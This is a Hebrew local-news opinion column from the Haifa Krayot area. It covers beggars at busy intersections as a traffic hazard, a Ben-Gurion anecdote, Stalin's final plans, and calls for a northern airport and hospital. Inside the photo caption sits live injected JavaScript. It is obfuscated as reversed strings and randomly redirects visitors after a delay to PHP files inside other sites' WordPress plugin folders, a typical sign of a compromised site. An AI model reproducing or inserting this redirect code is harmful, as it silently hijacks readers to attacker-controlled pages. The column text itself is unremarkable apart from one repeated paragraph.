fbpx
[shortcode-weather-atlas city_selector=1178232 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

קבצנים בצמתים

הקבצנים שנראים בצמתים הסואנים של הקריות הם מפגע תעבורתי וכדאי שהמשטרה או הפיקוח יטפלו בנושא מבעוד מועד, כי התופעה המצערת הולכת ומתרחבת
קבצן
קבצן | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

מאת: צ'רקס

תופעה חדשה ברחבי הקריות, שמחייבת אותנו להתייחס אליה בכובד ראש. בזמן האחרון בכל צומת מרכזי מסתובבים לפחות שני קבצנים ומבקשים נדבות. התופעה תפסה תאוצה, אולי בגלל המצב הכלכלי ואולי בגלל שאחד מחקה את השני.

בעל חנות באחד הצמתים בקריות סיפר לי, שהקבצן שמסתובב בצומת עם מסיכה על פניו ושלט, שהוא זקוק לאוכל, בא אליו כל שעתיים ומבקש להחליף את המטבעות בשטרות של 100 שקלים. בחמש שעות של פעילות הקבצן גורף כ-300 שקלים, הכנסה לא רעה בימים טרופים אלו.

התופעה המצערת הולכת ומתרחבת, ואנחנו הופכים את מקום מגורינו לסוג של עיירה מזרח אירופית מסיפורי שלום עליכם

הבעיה היא שהקבצן מסכן את עצמו ואת הנהגים, והקבצנות הופכת למפגע תעבורתי. כדאי שמישהו מהמשטרה או הפיקוח יטפל בנושא מבעוד מועד, כי התופעה המצערת הולכת ומתרחבת, ואנחנו הופכים את מקום מגורינו לסוג של עיירה מזרח אירופית מסיפורי שלום עליכם. מילא שם זה היה חלק מהחיים, אבל פה יש מוסדות רווחה וביטוח לאומי, וכדאי שהם יטפלו בנושא לפני שנהפוך לשכונות בנוסח אלו שקיימות בסוריה ובטורקיה. חברה צריכה לדאוג לעניים שבתוכה ולדאוג שלא תהיה הזנחה חברתית, שהופכת לתופעה מדאיגה ואף מסוכנת.

מנהיגות

בשנת 1946, שנתיים לפני שקמה המדינה, דוד בן גוריון הזמין למשרדו בירושלים את נציגי המופתי הירושלמי. הוא אמר להם שבתוך שנתיים תהיה פה מדינה ורצוי שהם ישתלבו בתוכה ולא יפתחו במלחמה. כדאי לכם, אמר הזקן למנהיגות הערבית, בתוך 10 שנים נקים מדינה ולכם זה ייקח 100 שנה. ענו לו חברי המשלחת, אז נחכה 100 שנה, ויצאו מהחדר. אבל בינם לבין עצמם הם אמרו, ליהודים יש משהו שלנו אין. יש להם את דוד בן גוריון.

נזכרתי בסיפור הזה שמופיע בספרה של אניטה שפירא, שכתבה את הביוגרפיה של בן גוריון, וחשבתי לעצמי, כמה בימים קשים אלו, כשאין אמון במנהיגים, אנו זקוקים לפיגורה מנהיגותית ברמה של דוד בן גוריון. ואם הזכרנו מנהיגות, קראתי לאחרונה את ספרו של פרופסור רובינשטיין על הימים האחרונים של סטלין.

למזלו של העם היהודי, סטלין מת ב-1953, בלי שהספיק לממש את מזימתו. מעניין מה יפורסם בעוד 50 שנה על פוטין. ממש קשה כבר לחכות לפרסומים הללו.

כשסטלין מת ב-1953, ראשי מפ"ם בארץ הספידו אותו במלים "שמש העמים". מה שהם לא ידעו, שסטלין היה שמש שורפת, אנטישמי ופרנואיד. הוא תכנן ב-1953 להגלות את כל יהודי ברית המועצות למחוז נידח במזרח רוסיה, כאשר הם יסומנו בטלאי על בגדיהם.

למזלו של העם היהודי, סטלין מת ב-1953, בלי שהספיק לממש את מזימתו. מעניין מה יפורסם בעוד 50 שנה על פוטין. ממש קשה כבר לחכות לפרסומים הללו.

בקטנה

בקטנה, ממש בקטנה. מדינת ישראל רוצה להביא משקיעים לבנות מול עזה אי שישמש נמל לשדה תעופה במחיר של 150 מיליארד דולר. זה יפה וזה ראוי, אבל מה איתנו, הצפוניים, למה לא יבנו מסלול מטוסים לתוך המפרץ ויאפשרו לנו לטוס לאירופה ולשאר העולם משדה תעופה לטובת האזור.

חיפה הקריות וכל הצפון יכולים ליהנות מכך, ואם מתכננים בממשלה פרויקטים כלכליים ולא מס שפתיים לבחירות, כדאי לחשוב על בית חולים ממזרח לקרית אתא, שישרת את כל תושבי האזור בקריות ובמרחב הגליל ויוריד את העומס הבלתי נסבל בבתי החולים בחיפה רבתי.

במקום שהכסף יילך לבחירות מועד ד', אפשר לממש באמצעותו את שני הפרויקטים שאני מציע, שאינם שאפתניים במיוחד.

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות